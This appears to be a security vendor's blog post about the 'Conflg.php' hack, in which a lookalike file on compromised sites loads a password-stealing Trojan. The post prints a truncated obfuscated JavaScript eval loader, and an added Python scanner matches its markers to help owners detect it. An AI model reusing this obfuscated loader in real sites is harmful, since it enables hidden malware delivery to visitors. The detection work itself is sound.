• Conflg.php Hack

    One of the latest attacks we are tracking on the Internet has already infected about 250 websites at the time of our post. This number is growing rapidly. We will be posting more details regarding the Conflg.php Hack and the reason it is infecting benign websites in our forthcoming posts.

    What is the purpose of the Conflg.php Hack?
    This particular attack creates a file called “Conflg.php” in the user’s hosting account. These malicious hackers apparently named the file “Conflg.php” in the hope that the name looks similar to the “config.php” file found in WordPress installations and many other CMS packages. In most cases, the goal of the website infection is to prompt visitors to install a password-stealing Trojan onto their PCs.

    The password stealing Trojan is loaded from sites including the following:


    The malware contained in Conflg.php looks like the following:

    var s=new String();try{document[0][1]}catch(q){if(q)r=1;c=String;}if(r&&document.createTextNode)y=2;e=eval;m=[4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y[snipped],mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.appendChild(null)}catch(q){e(s);}

    Why do malicious hackers use obfuscated filenames?
    The primary reason is to confuse the website owner about the legitimacy of the file’s contents. An owner who believes that the file containing the malware code is a legitimate part of the software powering the website, when this is in fact not the case, is unlikely to delete it.

    How do I know if my site is infected?
    Check your website for the existence of a file named “Conflg.php” or the contents shown above. Additionally, please be extra vigilant if your website is hosted by Softlayer or ThePlanet, as a majority of sites with this infection seem to have been hosted there (within their IP blocks).
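
One way to run the check described above across a web root, as an added example that is not part of the original post: it flags files named Conflg.php and files containing at least two markers taken from the obfuscated sample shown earlier. The case-insensitive name match, the marker labels, the two-marker threshold and the read cap are assumptions of this example.

```python
import os
import re
import sys

SUSPECT_NAME = "conflg.php"  # assumption: compare file names case-insensitively

# Markers taken from the obfuscated sample on this page; the labels are ours.
MARKERS = {
    "split fromCharCode": re.compile(r"['\"]fro['\"]\s*\+\s*['\"]mCharCode['\"]"),
    "eval alias": re.compile(r"\be\s*=\s*eval\b"),
    "forced exception": re.compile(r"document\.appendChild\(null\)"),
    "y-scaled char array": re.compile(r"(?:\d+(?:\.\d+)?[*/]y,){20,}"),
}
MIN_MARKERS = 2              # assumed threshold to limit false positives
MAX_BYTES = 2 * 1024 * 1024  # assumed cap on bytes read per file


def read_text(path):
    """Return up to MAX_BYTES of the file as text, or '' if it cannot be read."""
    try:
        with open(path, "rb") as fh:
            return fh.read(MAX_BYTES).decode("latin-1")
    except OSError:
        return ""


def scan_webroot(root):
    """Return sorted (relative_path, reasons) pairs for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = ["lookalike filename"] if name.lower() == SUSPECT_NAME else []
            text = read_text(path)
            hits = [label for label, rx in MARKERS.items() if rx.search(text)]
            if len(hits) >= MIN_MARKERS:
                reasons.extend(hits)
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


if __name__ == "__main__":
    for rel, why in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {', '.join(why)}")
```

A file that matches only one content marker is not reported, so a legitimate script that merely uses `document.appendChild` or `eval` on its own does not trigger a finding.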

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…